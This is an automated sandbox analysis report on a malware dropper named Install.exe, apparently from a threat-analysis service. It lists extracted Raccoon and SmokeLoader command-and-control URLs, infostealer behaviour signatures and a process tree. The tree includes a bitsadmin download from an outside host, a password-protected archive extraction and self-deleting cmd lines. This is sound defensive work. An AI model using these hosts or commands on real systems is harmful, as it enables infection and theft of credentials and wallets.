Resubmissions

23-04-2021 20:37

210423-615p945p4n 10

23-04-2021 20:37

210423-ry1m14h36j 10

23-04-2021 20:36

210423-src6ygk9ra 10

Analysis

  • max time kernel
    1802s
  • max time network
    1713s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    23-04-2021 20:37

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 3 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Nirsoft 2 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 35 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 50 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:336
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s SENS
      1⤵
        PID:1420
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
        1⤵
          PID:1956
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2796
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s WpnService
          1⤵
            PID:2808
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Browser
            1⤵
              PID:2720
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
              1⤵
                PID:2556
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2544
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1244
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1236
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1076
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:396
                      • C:\Users\Admin\AppData\Roaming\jjhwcsw
                        C:\Users\Admin\AppData\Roaming\jjhwcsw
                        2⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5404
                      • C:\Users\Admin\AppData\Roaming\ijhwcsw
                        C:\Users\Admin\AppData\Roaming\ijhwcsw
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:5284
                        • C:\Users\Admin\AppData\Roaming\ijhwcsw
                          C:\Users\Admin\AppData\Roaming\ijhwcsw
                          3⤵
                          • Executes dropped EXE
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:5996
                      • C:\Users\Admin\AppData\Roaming\jjhwcsw
                        C:\Users\Admin\AppData\Roaming\jjhwcsw
                        2⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:3856
                      • C:\Users\Admin\AppData\Roaming\ijhwcsw
                        C:\Users\Admin\AppData\Roaming\ijhwcsw
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:4936
                        • C:\Users\Admin\AppData\Roaming\ijhwcsw
                          C:\Users\Admin\AppData\Roaming\ijhwcsw
                          3⤵
                          • Executes dropped EXE
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:4928
                      • C:\Windows\system32\rundll32.exe
                        C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\yUfZiouykJ\yUfZiouykJ.dll",yUfZiouykJ
                        2⤵
                        • Windows security modification
                        • Drops file in System32 directory
                        • Modifies data under HKEY_USERS
                        PID:5896
                      • C:\Users\Admin\AppData\Roaming\jjhwcsw
                        C:\Users\Admin\AppData\Roaming\jjhwcsw
                        2⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:6060
                      • C:\Users\Admin\AppData\Roaming\ijhwcsw
                        C:\Users\Admin\AppData\Roaming\ijhwcsw
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:4852
                        • C:\Users\Admin\AppData\Roaming\ijhwcsw
                          C:\Users\Admin\AppData\Roaming\ijhwcsw
                          3⤵
                          • Executes dropped EXE
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:2192
                    • C:\Users\Admin\AppData\Local\Temp\Install.exe
                      "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:808
                      • C:\Users\Admin\AppData\Local\Temp\is-TOJG0.tmp\Install.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-TOJG0.tmp\Install.tmp" /SL5="$400FE,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:3824
                        • C:\Users\Admin\AppData\Local\Temp\is-KV26F.tmp\Ultra.exe
                          "C:\Users\Admin\AppData\Local\Temp\is-KV26F.tmp\Ultra.exe" /S /UID=burnerch1
                          3⤵
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3460
                          • C:\Users\Admin\AppData\Local\Temp\e1-f2d49-d04-f31a4-ec677617486c3\Qywolapysha.exe
                            "C:\Users\Admin\AppData\Local\Temp\e1-f2d49-d04-f31a4-ec677617486c3\Qywolapysha.exe"
                            4⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            • Modifies system certificate store
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3140
                          • C:\Users\Admin\AppData\Local\Temp\99-52e81-a70-2ed87-85ae5fd0e9c94\Dyzheqopopae.exe
                            "C:\Users\Admin\AppData\Local\Temp\99-52e81-a70-2ed87-85ae5fd0e9c94\Dyzheqopopae.exe"
                            4⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:1004
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kxgsbfkh.uq5\instEU.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4240
                              • C:\Users\Admin\AppData\Local\Temp\kxgsbfkh.uq5\instEU.exe
                                C:\Users\Admin\AppData\Local\Temp\kxgsbfkh.uq5\instEU.exe
                                6⤵
                                • Executes dropped EXE
                                PID:5028
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5d4rmt4d.oel\md1_1eaf.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:5920
                              • C:\Users\Admin\AppData\Local\Temp\5d4rmt4d.oel\md1_1eaf.exe
                                C:\Users\Admin\AppData\Local\Temp\5d4rmt4d.oel\md1_1eaf.exe
                                6⤵
                                • Executes dropped EXE
                                • Checks whether UAC is enabled
                                PID:6092
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y5d3gr2k.xyv\google-game.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4672
                              • C:\Users\Admin\AppData\Local\Temp\y5d3gr2k.xyv\google-game.exe
                                C:\Users\Admin\AppData\Local\Temp\y5d3gr2k.xyv\google-game.exe
                                6⤵
                                  PID:4820
                                  • C:\Windows\SysWOW64\rundll32.exe
                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                    7⤵
                                    • Loads dropped DLL
                                    • Modifies registry class
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of WriteProcessMemory
                                    PID:5156
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nzakru2j.hwp\y1.exe & exit
                                5⤵
                                • Suspicious use of WriteProcessMemory
                                PID:5172
                                • C:\Users\Admin\AppData\Local\Temp\nzakru2j.hwp\y1.exe
                                  C:\Users\Admin\AppData\Local\Temp\nzakru2j.hwp\y1.exe
                                  6⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:5404
                                  • C:\Users\Admin\AppData\Local\Temp\rJ4KD4MOBB.exe
                                    "C:\Users\Admin\AppData\Local\Temp\rJ4KD4MOBB.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    • Modifies system certificate store
                                    PID:5552
                                    • C:\Users\Admin\AppData\Roaming\1619217771421.exe
                                      "C:\Users\Admin\AppData\Roaming\1619217771421.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619217771421.txt"
                                      8⤵
                                      • Executes dropped EXE
                                      PID:5744
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\rJ4KD4MOBB.exe"
                                      8⤵
                                        PID:5776
                                        • C:\Windows\SysWOW64\PING.EXE
                                          ping 127.0.0.1 -n 3
                                          9⤵
                                          • Runs ping.exe
                                          PID:2976
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\nzakru2j.hwp\y1.exe"
                                      7⤵
                                        PID:5936
                                        • C:\Windows\SysWOW64\timeout.exe
                                          timeout /T 10 /NOBREAK
                                          8⤵
                                          • Delays execution with timeout.exe
                                          PID:5676
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ioyamqnw.ty3\inst.exe & exit
                                    5⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:5252
                                    • C:\Users\Admin\AppData\Local\Temp\ioyamqnw.ty3\inst.exe
                                      C:\Users\Admin\AppData\Local\Temp\ioyamqnw.ty3\inst.exe
                                      6⤵
                                      • Executes dropped EXE
                                      PID:5632
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\e5qfuocc.ubl\SunLabsPlayer.exe /S & exit
                                    5⤵
                                      PID:5732
                                      • C:\Users\Admin\AppData\Local\Temp\e5qfuocc.ubl\SunLabsPlayer.exe
                                        C:\Users\Admin\AppData\Local\Temp\e5qfuocc.ubl\SunLabsPlayer.exe /S
                                        6⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Drops file in Program Files directory
                                        PID:4460
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss8BB8.tmp\tempfile.ps1"
                                          7⤵
                                            PID:2156
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss8BB8.tmp\tempfile.ps1"
                                            7⤵
                                              PID:5148
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss8BB8.tmp\tempfile.ps1"
                                              7⤵
                                                PID:4272
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss8BB8.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:4908
                                                  • C:\Windows\System32\Conhost.exe
                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    8⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetWindowsHookEx
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:4820
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss8BB8.tmp\tempfile.ps1"
                                                  7⤵
                                                    PID:4196
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss8BB8.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:4724
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss8BB8.tmp\tempfile.ps1"
                                                      7⤵
                                                      • Checks for any installed AV software in registry
                                                      PID:4072
                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                      "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                      7⤵
                                                      • Download via BitsAdmin
                                                      PID:4236
                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pjlLAVBBbnyzh2Zt -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:4456
                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pWQTBXcK4RuHR2RT -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                      7⤵
                                                      • Executes dropped EXE
                                                      • Drops file in Program Files directory
                                                      PID:4912
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss8BB8.tmp\tempfile.ps1"
                                                      7⤵
                                                        PID:5524
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss8BB8.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:5348
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss8BB8.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:4732
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss8BB8.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:3424
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss8BB8.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:3020
                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\yUfZiouykJ\yUfZiouykJ.dll" yUfZiouykJ
                                                                7⤵
                                                                • Loads dropped DLL
                                                                PID:5416
                                                                • C:\Windows\system32\rundll32.exe
                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\yUfZiouykJ\yUfZiouykJ.dll" yUfZiouykJ
                                                                  8⤵
                                                                  • Loads dropped DLL
                                                                  • Drops file in System32 directory
                                                                  PID:2816
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss8BB8.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:5716
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss8BB8.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:4472
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss8BB8.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:4524
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss8BB8.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:6088
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss8BB8.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:1032
                                                                        • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                          "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          PID:5412
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mbvqifgs.jdd\GcleanerWW.exe /mixone & exit
                                                                      5⤵
                                                                        PID:5984
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pic2kmtz.enk\toolspab1.exe & exit
                                                                        5⤵
                                                                          PID:4124
                                                                          • C:\Users\Admin\AppData\Local\Temp\pic2kmtz.enk\toolspab1.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\pic2kmtz.enk\toolspab1.exe
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:5100
                                                                            • C:\Users\Admin\AppData\Local\Temp\pic2kmtz.enk\toolspab1.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\pic2kmtz.enk\toolspab1.exe
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Checks SCSI registry key(s)
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:4976
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\szklguib.2az\c7ae36fa.exe & exit
                                                                          5⤵
                                                                            PID:4380
                                                                            • C:\Users\Admin\AppData\Local\Temp\szklguib.2az\c7ae36fa.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\szklguib.2az\c7ae36fa.exe
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Checks SCSI registry key(s)
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:5244
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iqbyavzm.1s2\app.exe /8-2222 & exit
                                                                            5⤵
                                                                              PID:4704
                                                                              • C:\Users\Admin\AppData\Local\Temp\iqbyavzm.1s2\app.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\iqbyavzm.1s2\app.exe /8-2222
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                PID:5456
                                                                                • C:\Users\Admin\AppData\Local\Temp\iqbyavzm.1s2\app.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\iqbyavzm.1s2\app.exe" /8-2222
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  • Modifies data under HKEY_USERS
                                                                                  PID:856
                                                                    • \??\c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                      1⤵
                                                                      • Suspicious use of SetThreadContext
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:364
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                        2⤵
                                                                        • Drops file in System32 directory
                                                                        • Checks processor information in registry
                                                                        • Modifies data under HKEY_USERS
                                                                        PID:5504
                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                      1⤵
                                                                      • Drops file in Windows directory
                                                                      • Modifies Internet Explorer settings
                                                                      • Modifies registry class
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:688
                                                                    • C:\Windows\system32\browser_broker.exe
                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                      1⤵
                                                                      • Modifies Internet Explorer settings
                                                                      PID:188
                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                      1⤵
                                                                      • Suspicious behavior: MapViewOfSection
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:4172
                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                      1⤵
                                                                      • Modifies Internet Explorer settings
                                                                      • Modifies registry class
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4776
                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                      1⤵
                                                                      • Modifies registry class
                                                                      PID:4372
                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                      1⤵
                                                                      • Modifies registry class
                                                                      PID:5760
                                                                    • \??\c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                      1⤵
                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                      PID:4428
                                                                    • C:\Users\Admin\AppData\Local\Temp\683B.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\683B.exe
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      PID:4516
                                                                    • C:\Users\Admin\AppData\Local\Temp\6CE0.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\6CE0.exe
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      PID:6052
                                                                    • C:\Users\Admin\AppData\Local\Temp\728E.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\728E.exe
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:4476
                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                        2⤵
                                                                          PID:5560
                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                          2⤵
                                                                            PID:4600
                                                                        • C:\Users\Admin\AppData\Local\Temp\802B.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\802B.exe
                                                                          1⤵
                                                                          • Executes dropped EXE
                                                                          PID:5480
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5480 -s 272
                                                                            2⤵
                                                                            • Program crash
                                                                            PID:1448
                                                                        • C:\Users\Admin\AppData\Local\Temp\84E0.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\84E0.exe
                                                                          1⤵
                                                                          • Executes dropped EXE
                                                                          PID:5208
                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                          1⤵
                                                                            PID:5800
                                                                          • C:\Windows\explorer.exe
                                                                            C:\Windows\explorer.exe
                                                                            1⤵
                                                                              PID:4944
                                                                            • C:\Windows\SysWOW64\explorer.exe
